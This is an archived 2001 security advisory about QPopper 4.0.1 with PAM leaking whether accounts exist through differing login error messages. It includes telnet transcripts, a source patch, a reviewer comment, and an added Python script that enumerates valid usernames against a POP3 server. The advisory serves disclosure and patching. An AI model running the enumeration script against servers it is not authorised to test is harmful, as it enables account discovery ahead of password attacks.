[UNIX] QPopper in Conjunction with PAM Allows Account Verification

From: support@securiteam.com
Date: 09/02/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [UNIX] QPopper in Conjunction with PAM Allows Account Verification
Message-Id: <20010902070517.DAED8138BF@mail.der-keiler.de>
Date: Sun,  2 Sep 2001 09:05:17 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  QPopper in Conjunction with PAM Allows Account Verification
------------------------------------------------------------------------

SUMMARY

When QPopper is used in conjunction with PAM (Pluggable Authentication
Modules), a remote attacker can determine whether a given user name exists
on the host: the error returned after a failed USER/PASS login differs
depending on whether the account is known to the system, so no valid
password is needed to tell the two cases apart.

DETAILS

Vulnerable systems:
QPopper version 4.0.1 with PAM

Example:
Existing account:
# telnet 10.10.10.1 110
Trying 10.10.10.1...
Connected to 10.10.10.1.
Escape character is '^]'.
+OK ready <22975.998689264@target.host>
user validuser
+OK Password required for validuser.
pass valid
-ERR [AUTH] PAM authentication failed for user "validuser": Authentication failure (7)
+OK Pop server at target.host signing off.
Connection closed by foreign host.

Non-existent account:
# telnet 10.10.10.1 110
Trying 10.10.10.1...
Connected to 10.10.10.1.
Escape character is '^]'.
+OK ready <22984.998689464@target.host>
user fakeuser
+OK Password required for fakeuser.
pass fakeeeee
-ERR [AUTH] Password supplied for "fakeuser" is incorrect.
+OK Pop server at target.host signing off.
Connection closed by foreign host.

Compare the two -ERR lines: a failed login for an existing account is
reported as a PAM authentication failure, while a failed login for a
non-existent account is reported as an incorrect password. The server thus
acts as an oracle for account existence, and an attacker can walk through a
list of candidate user names and keep those that produce the PAM-style
error. Note that the fix below only makes the two messages identical; any
remaining difference in response time between the two code paths is not
addressed by it.
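The probing exchange described above, written out as an added example (not code from the advisory or from Qpopper). Rather than hard-coding the two messages, it probes a surely bogus name first and treats its -ERR as the baseline, then flags any candidate whose -ERR wording differs, which generalises to other servers and correctly reports nothing on a patched Qpopper that sends one uniform message. The -ERR strings and the "+OK Password required for" reply are copied from the transcripts; the function and class names, the in-memory fake server, its greeting and the sample user names are constructed here.

```python
"""Differential USER/PASS probe for the Qpopper/PAM account oracle.
Added example for this advisory, not code from the report or from Qpopper.
The -ERR strings and the "+OK Password required for" reply are copied from
the transcripts; function and class names, the fake greeting and the sample
user names are constructed for illustration."""
import socket


def probe_session(connect, username, password="x"):
    """One POP3 session: USER/PASS, then return the reply to PASS (no CRLF).
    connect() must return text-mode (rfile, wfile) for a fresh connection."""
    rfile, wfile = connect()
    try:
        greeting = rfile.readline()
        if not greeting.startswith("+OK"):
            raise RuntimeError("unexpected greeting: %r" % greeting)
        wfile.write("USER %s\r\n" % username)
        wfile.flush()
        user_reply = rfile.readline()
        if not user_reply.startswith("+OK"):
            # A server rejecting unknown names already at USER is an even
            # more direct oracle; hand that reply back for comparison.
            return user_reply.rstrip("\r\n")
        wfile.write("PASS %s\r\n" % password)
        wfile.flush()
        # One CRLF-terminated line: the "(7)" on its own line in the advisory
        # is mail-client folding, not a second line from the server.
        pass_reply = rfile.readline().rstrip("\r\n")
        wfile.write("QUIT\r\n")
        wfile.flush()
        return pass_reply
    finally:
        for f in (rfile, wfile):
            f.close()


def normalise(reply, username):
    """Mask the echoed user name so only server-chosen wording is compared."""
    return reply.replace('"%s"' % username, '"<user>"')


def find_accounts(connect, candidates, bogus_name="zq7x-no-such-user"):
    """The -ERR for a surely bogus name is the baseline; any candidate whose
    normalised -ERR differs is flagged as an existing account.  A server that
    sends one uniform message (Qpopper with the patch) flags nothing."""
    baseline = normalise(probe_session(connect, bogus_name), bogus_name)
    flagged = {}
    for name in candidates:
        flagged[name] = normalise(probe_session(connect, name), name) != baseline
    return baseline, flagged


def connect_tcp(host, port=110, timeout=10):
    """Real target: text-mode read and write ends of one TCP session."""
    sock = socket.create_connection((host, port), timeout=timeout)
    rfile = sock.makefile("r", encoding="latin-1", newline="\r\n")
    wfile = sock.makefile("w", encoding="latin-1", newline="")
    sock.close()  # takes effect once both file objects are closed
    return rfile, wfile


class FakePopper:
    """In-memory stand-in for Qpopper 4.0.1 with PAM, built from the
    advisory's transcripts.  One instance is one session and serves as both
    ends of the connection; patched=True emulates the advisory's fix."""

    def __init__(self, valid_users, patched=False):
        self.valid_users, self.patched, self.user = valid_users, patched, None
        self.pending = ["+OK ready <1.1@target.host>\r\n"]  # constructed

    def readline(self):
        return self.pending.pop(0) if self.pending else ""

    def write(self, data):
        verb, _, arg = data.strip().partition(" ")
        if verb == "USER":
            self.user = arg
            self.pending.append("+OK Password required for %s.\r\n" % arg)
        elif verb == "PASS":
            if self.user in self.valid_users and not self.patched:
                self.pending.append('-ERR [AUTH] PAM authentication failed for user '
                                    '"%s": Authentication failure (7)\r\n' % self.user)
            else:
                self.pending.append('-ERR [AUTH] Password supplied for "%s" is '
                                    'incorrect.\r\n' % self.user)
        elif verb == "QUIT":
            self.pending.append("+OK Pop server at target.host signing off.\r\n")

    def flush(self):
        pass

    close = flush  # nothing to release for the in-memory session


def demo(patched=False):
    """Probe the fake server with constructed names; swap in
    lambda: connect_tcp("pop.example.test") to test a real host you own."""
    def connect():
        session = FakePopper({"validuser", "root"}, patched)
        return session, session
    return find_accounts(connect, ["validuser", "fakeuser", "root"])
```

Against the fake vulnerable server demo() flags validuser and root and not fakeuser; with patched=True nothing is flagged, which is exactly the check to run against your own server after applying the fix. Each candidate costs one full connection and one failed login, so expect the attempts to appear in the server's authentication log.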

Patch:
The following patch fixes this behavior:
---cut---
--- popper/pop_pass.c.orig Sat Aug 25 19:05:41 2001
+++ popper/pop_pass.c Sat Aug 25 19:06:58 2001
@@ -368,7 +368,7 @@
  */
 static int gp_errcode = 0;
 static char *GP_ERRSTRING =
- "[AUTH] PAM authentication failed for user \"%.100s\": %.128s
(%d)";
+ "[AUTH] Password supplied for \"%.100s\" is incorrect.";

 static int
 PAM_qpopper_conv ( int num_msg,
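Review bot: the new GP_ERRSTRING keeps only the %.100s conversion, but the call that formats it is not in this hunk; it presumably still passes the PAM error string and gp_errcode (declared two lines above), which a printf-style call tolerates but which leaves gp_errcode effectively unused and silently drops the PAM reason ("Authentication failure (7)") instead of moving it to the server-side log. Consider logging the detailed reason via syslog and sending only the generic text to the client, so operators can still diagnose PAM misconfiguration. Also note that the removed line is folded across two lines as quoted here (`"[AUTH] PAM authentication failed for user \"%.100s\": %.128s` / `(%d)";`), so the hunk will not apply with patch(1) until that line is rejoined.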
---cut---

ADDITIONAL INFORMATION

The information has been provided by Charles Chear <presto@tpgn.net>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


